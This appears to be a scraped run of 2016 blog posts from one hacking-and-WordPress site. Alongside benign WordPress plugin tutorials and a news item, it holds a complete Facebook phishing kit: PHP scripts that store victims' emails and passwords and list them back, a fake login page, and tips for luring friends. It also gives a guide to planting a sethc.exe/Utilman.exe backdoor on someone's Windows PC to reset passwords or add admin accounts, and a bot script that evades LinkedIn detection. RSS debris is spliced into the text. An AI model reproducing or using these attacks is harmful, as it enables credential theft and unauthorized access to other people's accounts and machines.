Hack LinkedIn

Why Hack LinkedIn?

This professional network is very important to a large community of professionals who want to find a job, find a candidate or just to share their work and experience.

It is very important to maximize the number of connections you have, especially if you are seeking for a job. When a recruiter is searching for a position similar to yours, you will be one of his connections, therefore having the chance to be on the top search.

Hack LinkedIn is as simple as a script that I wrote personally, to connect to a big number of people. Not any type of people, only those who have specific positions related to yours or positions you are interested in.

This helped me connect to more than 10,000 connections in matter of days and the counter is running. So why not hack LinkedIn?

How It Work?

This script will search the description or position of each person, and check if it contain any of the keywords you set for it, if so it will connect to them, else dismiss them, in a way that LinkedIn Servers won’t know it is a robot.

Now LinkedIn Updated their system, but so did I, updated my script so it works smoothly with the new version 😀

Hence to do that just:

  • Open your profile in a browser on PC or Laptop not mobile (Recommended Firefox or Chrome)
  • Got to “My Network” section
  • Right click on a blank space and click on “Inspect Element” OR click F12 from the keyboard
  • Go to the console section
  • Replace my keywords with your keywords in the below line, then copy and paste in your console, be careful to follow the same sequence, and note that all keywords are not case-sensitive so don’t worry about that, also note the keyword “dev” will connect with “developer”, “development” and any other word that contain “dev”.
var keyWords = ["Engineer", "dev" , "Android", "php" , "ios" , "Software" , "net" , "program", "JAVA" , "sql" , "database" ,"Computer", "network", "telecom" , "cce" , "tech", "admin" , "ceo", "hr", "human re", "manage"];
  • Let The Magic Begin, copy this last part and enjoy:
//Author: Salam El-Banna
var connections=0;
var rejections=0;
function connect(){
var e=document.getElementsByClassName('mn-pymk-list__card');
for(i=0;i<e.length;i++){
var addMember=false;
var headline=e[i].getElementsByClassName('pymk-card__occupation')[0];
var des=headline.innerHTML;
for(j=0;j<keyWords.length;j++){
  var reg = new RegExp(keyWords[j], 'i');
  var checker = des.match(reg);
  if (checker){addMember=true; break;}
}
if(addMember){
e[i].getElementsByClassName('button-secondary-small')[0].click();
console.log(des);
connections++;
}else{
e[i].getElementsByClassName('pymk-card__close-btn')[0].click();
rejections++;
}}
console.log("Invitations Sent:");
console.log(connections);
console.log("People Dismissed:");
console.log(rejections);
scroll(0,100000);
scroll(0,0);
scroll(0,100000);
}
var salamInterval = setInterval(function() { window.scrollTo(0,document.body.scrollHeight); connect();}, 1000);
function stopSalamsMagic(){
  clearInterval(salamInterval);
}

You will see in the console:

Invitations Sent: 256
People Dismissed: 102

As a result this will give you the exact number of invitations sent and the number of people who are dismissed.

Must Read: Unlock Any Windows Password With Zero Hacking Experience

When you had enough 😀 and want to stop the script from connecting, insert the line below in console and hit Enter:

stopSalamsMagic();
//Too much Ego 😉

Important: Don’t try to hack LinkedIn often to many times in one day because you will get banned, run it only couple of times each day and you will get like 100 new connections daily in just 2 min.

Finally Just Enjoy 😀

Another JavaScript Game

Coming to JavaScript always there is surprises, after the Asteroids JavaScript Game, another one come to the media. The Katamari with the same purpose to destroy the web. Katamari is a ball that you control with your mouse and smash Html Css elements, but not vanishing them, they just roll over the ball. Also its uses the depth and other options to create realistic destruction.

Of course its just a game, nothing real happening to the website, only its disturbed on your browser. When you refresh the page you will see the original page again. So it is just for fun and to know that with JavaScript there are no limits.

It is created by KatHack, and the winner of the 2011 Yahoo HackU contest at University of Washington.

The hack is inspired by the popular Katamari game where you are given a ball, known as a Katamari, that you have to roll to collect as much stuff as you can on the ground. It however works only with Chrome though Firefox and IE 9 also supports HTML5.

How To Play?

The controls are very simple and can be customized by you. Just Drag the link Katamari Parposa into your Bookmarks bar, open the page you want to mess with, and click the link. Furthermore you can just copy below code and paste it in the address bar make sure that javascript: is added at the beginning:

javascript:var i,s,ss=['http://kathack.com/js/kh.js','http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js'];for(i=0;i!=ss.length;i++){s=document.createElement('script');s.src=ss[i];document.body.appendChild(s);}void(0);

A popup window will show you all the details you should know. Use your mouse to roll up elements of the web page for fun and… well, that’s about it, really. Create A Google Analytics Plugin For WordPress – Track Easier https://parposa.com/wordpress/create-google-analytics-plugin-wp/ https://parposa.com/wordpress/create-google-analytics-plugin-wp/#respond Sat, 01 Oct 2016 00:01:18 +0000 https://parposa.com/?p=225 Adding Google Analytics to your site will help track who’s been visiting it and what they’ve been looking at, the easiest way to do this is with a Plugin.

Google Analytics Plugin For WP

Why Google Analytics?

Adding Google Analytics to your WordPress installation will help you track who’s been visiting your site, what they’ve been looking at and how they got there, so you can know what readers are focusing on, and what readers are interested in.

The easiest way to do this is with a Plugin, with a plugin you can easily move your code to any other WordPress installation, just change the tracking code from google and you’re good to go. If you don’t know how to create a plugin no worries you will go through the process step by step, also you can check Create WP Plugin Of Any Modification To Reuse On Other Themes for more details.

Google tells you to insert the code in the
section of each page on your site, but the great news is that with WordPress you don’t need to do this, the plugin will automatically insert it into every new page that’s created in your site.

What You’ll Need:

  • A live WordPress installation
  • FTP access to your site’s files

I recommend using FileZilla as FTP client its free.

Creating The Plugin

1- Check Theme Hooks

The plugin we are creating is going to attach code using the wp_head hook in the header.php file, so first we need to check that your theme is calling this hook.

In your FTP program, access the wp-content folder in your WordPress installation. Inside that, you’ll find a themes folder and then a folder for your active theme. For example, the folder containing the theme files for the twenty fifteen would be at wp-content/themes/twentyfifteen.

Note: It’s only the active theme that you have to concern about. Ignore any other themes you have installed in your site.

In your theme folder, you’ll find a file called header.php. Open it.

The header.php file includes all the code at the beginning of each page, including the
section of the page. You should find the wp_head hook at the end of the
section. If it is not found you have to add it, just add wp_head(); before
but be careful when updating the theme you will lose all changes, so I highly recommend creating a child theme and putting your edits there, check how to create a child theme it only takes you 5 minutes.

2- Get The Google Tracking Code

Assuming the hook is there, its time to get the tracking code from google.

When you add your site to your Google Analytics account, you’re given a tracking code that you need to insert into your site’s pages so that Google can track visitors to each page.

If you have a Google account you can get access to Analytics data using your existing account, once you’ve done that, you can copy your tracking code from the Admin section of the Analytics site.

At the top of the screen, click on Admin to get access to the admin screen shown in the screenshot.

Google Analytics Admin

Your account will automatically be selected on the left and you’ll need to add your website to the PROPERTY column in the center.

If you haven’t added your site to Google Analytics yet, click the PROPERTY drop-down box and select Create New Property. If you’ve already added your site, select that from the PROPERTY drop-down box and then click the Tracking Info button beneath it. Skip the next step.

Adding Your Website to Google Analytics:

After clicking the Create New Property option, you’ll be prompted to provide details of your site in the New Property screen:

Google Analytics New Property

Fill out the fields with your site’s details and click the Get Tracking ID button so you get access to your tracking code.

Accessing Your Tracking Code:

Whether you’ve created a new property or clicked the button to get access to the tracking code for an existing property, you’ll now be presented with the code to insert into your site:

Google Analytics Tracking Code

Copy everything including the opening and closing
<?php }
add_action( 'wp_head', 'parposa_google_analytics', 10 );

4- Activating the Plugin

Now save your plugin file and go to your site admin screens. As a result you’ll see your new plugin listed in the Plugins screen.

Activate the plugin and go back to the Google analytics site to verify your tracking code. You may have to wait a short while until Google picks up the new code, and you will be notified that the code is working.

Summing Up

If you want to manually add a Google tracking code to your WordPress site, then you shouldn’t be adding it to your theme. Instead, the better way is to write a simple plugin like the one we’ve just created.

This plugin includes a function containing the tracking code provided by Google. You then attach that function to the wp_head hook. This hook is present in the
section of all well-written themes therefore lets you insert code without having to hack your theme.

As a result once you’ve done all that, you’ll be able to track visitors to your site as part of your SEO strategy.

As Always: Enjoy 😀

Plant A Windows Backdoor – The Complete Beginner’s Guide https://parposa.com/hacks/plant-windows-backdoor-complete-guide/ https://parposa.com/hacks/plant-windows-backdoor-complete-guide/#respond Sun, 25 Sep 2016 10:34:20 +0000 https://parposa.com/?p=213 Planting a windows backdoor on a computer will allow you to bypass the user password at the login screen and create new user without even first logging in.

The post Plant A Windows Backdoor – The Complete Beginner’s Guide appeared first on Parposa.

Windows Backdoor

Why Windows Backdoor?

Planting a windows backdoor on a computer will allow you to bypass the user password at the login screen and create new user without even first logging in to Windows, this can be done without any third-party program or any Bootable CD or USB, once you plant it any time you have physical access to the computer the game is on 😛

The only problem is that you need to have access to the target computer only the first time when you’re planting the windows backdoor, it is difficult but you can’t know a small mistake from your friend or victim leaving their Windows not locked, that’s your chance all you need is 5 min and you’re done, no CD, USB or any third-party program needed.

How Windows Backdoor Work?

On the login screen, if you press SHIFT key 5 times a software will launch, this software is called sethc.exe, located in the Windows directory, so what we are going to do is simple change its name to anything or just move it to another directory, grab a copy of cmd.exe and rename it to sethc.exe, so when Windows try to open sethc.exe it is actually opening a cmd.exe application with administrative privileges, and here comes the cool part, with cmd you can do whatever you like, create new user or remove the password for the current user.

Other than sethc.exe there is Utilman.exe, we will do the same process for it, the only thing is that Utilman.exe is triggered when you click on the Ease Of Access Button at the bottom of the screen, so in that way we have 2 Windows backdoor planted, double threat Baby 😀

Windows Backdoor - Ease Of Access Button

Might also like: Hack Facebook Email And Password 100% Working

Lets Get Started:

As I said, you need access to the target computer the first time.

Go to C:\Windows\System32 and search for sethc.exe file, once you’ve located it, rename to sethc0.exe or anything you like just something you can recognize later, now if you got a an error File Access Denied as in below image don’t panic we will overcome that.

Windows Backdoor - File Access Denied

Click Cancel, right click on sethc.exe click on Properties, Switch to Security Tab, Click on Advanced Button at the bottom, a new window will open, switch to Owner Tab, you will see that the Current Owner is TrustedInstaller, click on Edit… button, and change the current owner, you will be presented with a list of active users on that computer so just choose the Administrator or the user you are logged in with it, check image below:

Windows Backdoor - Choose Owner

Click OK button, you will see that the current owner is changed to the user you have chosen, close that window.

Back to the Properties window, click on Edit… button, check image:

Windows Backdoor - Edit Permissions

In the new window, mark the user you are logged in to, in my case Administrator, and in the permissions box below in the allow column, check the box beside Full Control and click OK, check image below:

Windows Backdoor - Set Allow

The stupid windows will alert you that what you are doing will reduce security, of course it will, we are planting a backdoor windows duhh!!!, anyway just click OK.

Now we have permissions to rename the file, close the current window and rename sethc.exe to sethc0.exe.

Go and search for cmd.exe, when you find it apparently you don’t have permissions to rename and copy it, so simply do the above permission steps to cmd.exe, when you’re done copy and paste it in the same folder, rename the new cmd – Copy.exe to sethc.exe, and that is it the windows backdoor is planted.

For Utilman.exe do the same process we did for sethc.exe, just go over the steps again and you’re done.

Using The Backdoor To Bypass Login Window:

After we planted our backdoor, here comes the cool part: Using It.

When you encounter the login window with a locked user that you don’t know his password, just hit the SHIFT key 5 times or click on the Ease Of Access button and you will prompted with a cmd window with administrative privileges.

Must Read: Compress Data 1GB Into 100MB And Less The Easy Way

At this point you have 2 choices either reset the password of the current user or create another new user:

1st method – Reset Password Of Current User:

Type: Net user username password and hit enter– This command allows you to set a new password to any username without knowing the current password.

replace username with the current username of the account you want to access and password with your new password.

And Voila, now access the account with the new password you have set.

2nd method – Create A New User:

Type: Net user username password /add and hit enter– This command allows you to add a new user to the system so you can login to Windows without touching the existing user accounts.

replace username and password with a username and password of your choice, these will be your login credentials.

Now we have created a normal user to give it Administrative Privileges just enter the command:

net localgroup administrators username /add and hit enter, replace username with the username you’ve created, and that’s it.

Now you have a new user with a Administrative Privileges

This proof of concept has been around for a very long time and is not really an exploit which is why Microsoft does not intend to patch and block it. To remove the backdoor, just rename the files to the original names and remove the cmd copies you have created.

Enjoy 😀

Facebook Page Takeover In 10 Seconds?

Everyone wants to know how to hack a Facebook page or an account but no one wants to do the hard work — here’s an Indian hacker who found a critical security flow in Facebook business manager allowing him to hack any Facebook page within 10 seconds.

Arun Sureshkumar, an Indian IT security researcher exposed a critical vulnerability in Facebook business manager allowing attackers to take over any Facebook page – In return Facebook awarded Sureshkumar with 16,000 USD as part of the bug bounty program.

Must Read: Free Hack Facebook Email And Password 100% Working

The issue discovered by hacker revolves around Insecure Direct Object Reference, also called IDOR. It refers to when a reference to an internal implementation object, such as a file or database key, is exposed to users without any other access control. In such cases, the attacker can manipulate those references to get access to unauthorized data. In Facebook’s case, IDOR vulnerability in Facebook Business Manager allowed him to take over any Facebook page in less than 10 seconds.

Business Manager actually lets businesses share and control access to their ad accounts, Pages, and other assets on Facebook. Anyone on a business page can see all of the Pages and ad accounts they work on in one place, without sharing login information or being connected to their coworkers on Facebook.

The researcher also mentioned that an attacker could even take over pages like Bill Gates, Narendra Modi , Barack Obama and do whatever kind of damage desired including deleting these pages.

Sureshkumar’s findings:

Sureshkumar made two Facebook business accounts, one as his own and the other for testing purposes. He then added a partner using his own ID and intercepted the request using Burp Suite. After that, he changed the parent business ID with agency ID and asset ID with the page ID he wanted to hack. Once done with changing IDs, the researcher requested manager role on the page.

Facebook Page Takeover

In few seconds, Sureshkumar had admin rights on the target page thus allowing him to perform the actions he wanted through the business manager.

Watch how Sureshkumar was able to hack a Facebook page in no time at all:

The security flaw was reported to Facebook on 29th August 2016 and lucky for Sureshkumar, while investigating his report; Facebook found and fixed another issue as well. That made the total bug bounty amount higher than those usually paid for page related flaws. As a consequence, he was paid 16,000 USD on the 16th of September this year.

More technical details are available on Arun SureshKumar’s blog.

Timeline:

All time-stamps are in India Standard Time. Omitted a few unimportant interactions.

  • 29 August 2016 at 00:08 : Initial report
  • 30 August 2016 at 06:52 : Bug acknowledged by security team member Nancy
  • 30 August 2016 at 12:29 : Security team member Neal Poole informed me that “Issue should be addressed (we’ve taken down the endpoint temporarily and are going to be removing it entirely)”.
  • 6 September 2016 at 21:30 : I replied confirming that the bug was patched.
  • 6 September 2016 at 23:04 :Security team member William informed me that “We have looked into this issue and believe that the vulnerability has been patched. Please follow up with us if you believe that the patch does not resolve this issue.”
  • 6 September 2016 at 23:04   : I replied Permanent fix patched the bug.
  • 16 September 2016 at 01:24 : Security team member Rusty informed me that “I wanted to reach out and inform you that we have decided to pay you a bounty of 16,000 dollars for this report. A majority of the bounty is for the page takeover capability of your exploit, but while investigating your report we discovered and fixed another issue as well, so the bounty is a little higher because of that. You can expect the standard longer payout message later in the week.”
  • 16 September 2016 at 02:32  : Bounty of $16,000 awarded.

This is a good legit way to benefit from hacking.

Hack Facebook

Hack Facebook Using Phishing Method

Many methods are available on how to hack Facebook, the method I will be using is the phishing method, it is about showing the user a page that it is not what really it is pretending to be, in our example we are going to show a page that looks exactly like the Facebook home page, but it is actually not.

You don’t need hacking skills to do this trick, just basic HTML & Database knowledge. You also need to set a hosting account to make your hack available online and use it literally anywhere.

A little explanation about how this will work, first create a fake page that looks just like the Facebook home page, edit the code so when they try to login in the form, their data will be sent to our PHP Script, the script will save the email and password in our database, then it will redirect the user to the real Facebook thing so he feels nothing at all Stealth Mode Style 😀

Let’s Get Started:

Step 1: Set Up Hosting

To use this trick anywhere online you need to get a hosting, don’t worry 000WebHost provides free hosting accounts. So go to 000webhost and register for a free account.

Step 2: Set Up Database

This requires basic hosting and database knowledge, you can get help from the 000webhost website.

Create a new database, and add a new table name it “users” containing 2 fields “email” & “password”.

Step 3: PHP Script That Will Do The Cool Stuff 😛

This will be a PHP file that will receive the victim email and password, save them in database and redirect to real Facebook page.

Just open a new text file and paste the below code in it and then save it as a .php file , don’t forget to put your own account data.

<?php

//Edit The Below Fields
$hostname="Your Host Name";
$username="Your User Name";
$password="Your Password";
$dbname="Your Databse Name";
$tablename="Your Table Name"
$redirect_user_to="The Facebook Page To redirect users to after hack is completed";

//Don't touch below
mysql_connect($hostname,$username, $password) or die ("

");
mysql_select_db($dbname);
$query = "Insert Into ".$tablename." values('".$_POST['email']."','".$_POST['pass']."')";
$result = mysql_query($query);
header("Location: ".$redirect_user_to);
exit;
?>

After editing the code and saving the file, upload it to your hosting and and get its link.

Step 4: Setup The Fake FACEBOOK Page

Now after the server part is setup we need to create a fake Facebook page that looks the same as the real one so victim doesn’t feel anything wrong. I already made created one, just open this link: https://parposa.com/parposa-wp/wp-content/uploads/2016/09/fake-facebook-copy.txt and copy the text from that page into your text editor, search for

<Enter Your Custom Link Here>

and replace it with the link of your php script you just uploaded to your hosting.

Also search for and replace the below terms to what fits your situation, try to be creative with the text so nothing looks suspicious to the victim, tell your friend to like a project you just posted so make the text relevant to that.

<Enter Your Custom Title Here>

make the title like: Engineering Project Bla Bla…

<Enter Custom Subtitle Here>

this subtitle will show while sharing the link on WhatsApp or so, another step to make the page look real.

Just Be Creative With The Text
After you are done, save the file as facebook.html and upload it to the same hosting account you already created.

Step 5: Tough Part Spreading The World

After you get the link of the facebook.html file share it to your friends or victims, but remember here comes the tough part, you have to convince them to login, when they enter the email and password only you will get the positive result, so again be creative.

Every successful hit a new account is hacked enjoy 😛

Step 6: Get The Hacked Accounts Details

Here comes the beautiful part, after sharing the hacked facebook.html file, and convincing victims to try to login, you need to retrieve the hacked accounts. I’ve created a PHP script that will do all the work for you, just create another file paste the below code in it, again change the preferences the same way you did in the first php script, and then save it as a .php file.

<?php
//Edit The Below Fields
$hostname="Your Host Name";
$username="Your User Name";
$password="Your Password";
$dbname="Your Databse Name";
$tablename="Your Table Name"

//Don't touch below
mysql_connect($hostname,$username, $password) or die ("

");
mysql_select_db($dbname);
$query = "Select * From ".$tablename;
$result = mysql_query($query);
$ar=array();
$nb= mysql_num_rows($result);
for($i=1;$i<=$nb;$i++){
$ar[$i]=mysql_fetch_row($result);
}
?>

Users

Email

Password

  <?php
  $size=sizeof($result);
  for($i=1;$i<=$nb;$i++){
  ?>

<?php echo $ar[$i][0] ; ?>

<?php echo $ar[$i][1] ; ?>

  <?php } ?>

<?php
?>

upload this file to your account and get its link, and that’s it just open the link and you will see a list of all accounts that been hacked by your fake page.

This method is one of the easy ways to do it, there are lot of ways to hack Facebook, I myself tried this method and it is working 100% also hacked many accounts, if it didn’t work for you, then you are doing something wrong, just try again and follow the steps carefully.

Remember, after hacking any account, don’t just go their and change the password, Facebook will detect that and won’t allow you, and all your effort will be gone.

Enjoy 😀

Create WP Plugin Of Any Modification To Reuse On Other Themes https://parposa.com/wordpress/create-wp-plugin-modification-reuse-themes/ https://parposa.com/wordpress/create-wp-plugin-modification-reuse-themes/#respond Wed, 07 Sep 2016 07:12:07 +0000 https://parposa.com/?p=168 The best way to package code for use with any theme is to add the code to a WP Plugin. Wordpress Plugins

One of the first things budding WordPress developers learn is to use child themes for customizing WordPress websites.

While this is a sound practice, there will also be times when you want to reuse code you’ve added to a child theme with a different theme or on a different website, this is where creating a WP Plugin becomes handy.

The best way to package code for use with any theme and on any WordPress website is to add the code to a simple plugin. Plugins are easy to copy from one website to another and can be used with any theme.

Let’s look at an example.

Imagine that you found a tutorial for making HTML tables responsive by adding code to a child theme. You love the look of HTML tables with this bit of code and want to keep using it after switching themes and also use the same code at several other WordPress sites. A WP Plugin makes this easy.

In this tutorial, I’ll walk through the process of converting a simple child theme modification into a custom plugin. Specifically, I’ll be creating a plugin that includes a CSS stylesheet and JavaScript file that contain code for creating sections that contain responsive HTML tables. However, you can apply the same basic idea to any child theme modifications you want to reuse across multiple websites or keep when switching themes.

Anatomy of a Plugin

The child theme modifications that we’re going to be converting into a plugin include two components: a short bit of CSS and a JavaScript file. In the original tutorial, the CSS was added to the child theme’s style.css file, and the JavaScript was added as a separate file and enqueued with the wp_enqueue_scripts hook. Those are the components we’ll need to incorporate into our custom plugin.

Our plugin will be made up of three files:

  • A php file which will provide basic information about the plugin and enqueue the CSS and JavaScript files.
  • A CSS file that will contain the CSS from the child theme’s style.css file.
  • A JavaScript file that will be a copy of the JavaScript file that was added to the child theme.

The resulting plugin structure will look like this:

screenshot of plugin directory structure

If you’re following along, take these steps to set up the plugin’s basic structure:

  1. Create a parent directory in the wp-content > plugins directory of a development or test WordPress installation.
  2. I’ve named the parent directory custom-css-and-js, but you can name yours whatever you like.
  3. Inside of the parent directory create two additional directories: css and js.
  4. Create the plugin’s primary php file and place it in the parent directory. I’ve named the plugin file custom-css-and-js.php.
  5. Create CSS and JavaScript files and place them in their respective directories. I’ve named these files custom-style.css and custom-scripts.js.

At this point, the basic plugin structure is in place. However, all of your plugin files are empty and if you visit Plugins > Installed Plugins you won’t see your plugin in the list of available plugins.

Adding a Plugin to the Dashboard

Let’s make the plugin show up in the list of available plugins at Plugins > Installed Plugins. All we need to do to make that happen is to add a properly formatted plugin file header to our php file.

<?php
/*
Plugin Name: Custom CSS and JS Plugin
Plugin URI:    https://github.com/jpen365/custom-css-and-js-plugin
Description: Add a custom CSS stylesheet and JavaScript file to WordPress
Version:       1.0
Author:        Salam Banna
Author URI:    https://parposa.com/about-me/
*/

Since this is a custom plugin for use on my own sites and not for general distribution, I’ve kept the file header short and to the point. With this information added to our plugin’s primary php file — the file named custom-css-and-js.php — the plugin will be available for activation when we go to Plugins > Installed Plugins.

Enqueuing a Stylesheet and Script File

While our plugin now shows up in the dashboard, it doesn’t do anything just yet. To get the plugin to do something we need to add php code to the plugin file. In this case, the code we’ll add will be a function that identifies our CSS and JavaScript files and adds them to WordPress with the wp_enqueue_scripts hook.

function custom_css_js_enqueue_scripts() {

    /* enqueue the custom-style.css file */
    wp_enqueue_style( 'custom-css', plugins_url( '/css/custom-style.css', __FILE__ ), $ver = false );

    /* enqueue the custom-scripts.js file */
    wp_enqueue_script( 'custom-js', plugins_url( '/js/custom-scripts.js', __FILE__ ), $deps = array( 'jquery' ), $ver = false, $in_footer = true );
}
add_action( 'wp_enqueue_scripts', 'custom_css_js_enqueue_scripts' );

Let’s walk through that function one step at a time.

  1. A new custom function named custom_css_js_enqueue_scripts is created. The name of the function is not important, but for clarity’s sake it should be a name that hints at the function’s purpose.
  2. The wp_enqueue_style() WordPress function is used to enqueue the custom stylesheet.
  3. The wp_enqueue_script() WordPress function is used to enqueue the JavaScript file.
  4. The add_action() WordPress function is used to tie our custom function to the wp_enqueue_scripts hook.

Adding Styles and Scripts

At this point, when the plugin is activated the custom CSS and JavaScript files will be served up along with the rest of the website files. However, nothing has been added to either file, so the plugin still doesn’t really do very much.

The next step is to put your custom css into the plugin’s custom-style.css file. Then add your JavaScript code into the plugin’s custom-scripts.js file. With the CSS and JavaScript in place they will be served up by the plugin.

The Result

The plugin created in this tutorial is really quite useful. You can add any CSS or JavaScript you wish to the corresponding files and it will be added to your site.

The CSS and JavaScript files connected to this plugin could be used to add in any custom styling or scripting. However, CSS and JavaScript aren’t the only child theme modifications you could add with a plugin.

  • Functions added to a child theme’s functions.php file could be added to a plugin instead, especially if they don’t define theme-specific behavior.
  • Ambitious WordPress developers can even add custom page templates with a plugin as well.

Really, the sky’s the limit. Any modification you’re thinking about adding via a child theme can almost certainly be added with a plugin instead.

Wrapping Up

Anytime you want to make changes to a WordPress site that you can reuse at other sites or with multiple themes, a WP Plugin is the logical tool for implementing those changes. Thankfully, creating a WP Plugin to replace simple child theme modifications is easy, and the result is flexible enough to handle just about any modification you dream up.

Stay Cool & Enjoy 😀

Mark Zuckerberg Tapes His Laptop Camera And Microphone To Keep Hackers At Bay

How do you keep yourself safe from the ever increasing hacks, security breaches and spying attempts? Whether you are a layman or a celebrity or the richest person in the world, privacy is of utmost importance to everyone.

Mark Zuckerberg, billionaire founder and CEO of Facebook is no different, according to a photo posted by the CEO shows that he appears to cover his laptop’s webcam with tape, he posted a congratulatory message on the Facebook-owned social media site Instagram to celebrate Instagram’s 500 million monthly user milestone, the picture showed Zuckerberg sitting next to an Apple MacBook, on a closer look of the MacBook, it seemed like Zuckerberg has placed tape over its webcam, on further examination, it appears as if he has taped over the headphone input jack on the left side of the MacBook, as well.

Hackers many a times are known to take control of your computers and secretly listen to your conversations and/or watch you from your laptop’s camera.

It appears as though Zuckerberg, who is worth $35.7billion, is trying to prevent that from happening by placing a piece of tape over his camera, making the webcam useless.

This inadvertent reveal comes just weeks after Zuckerberg’s social media accounts were hacked, one of which reportedly had the not-so-complex password “dadada”, while it is not known if the laptop is indeed owned by Zuckerberg, given the CEO’s prominence, such a move would be anything but surprising.

In the past too, top names such as FBI director James Comey and NSA whistleblower Edward Snowden have put tape over their webcams to protect their privacy. As Gizmodo points out, it is somewhat ironic that Zuckerberg would be paranoid about people spying on him when Facebook itself makes money by collecting data of over a billion people.
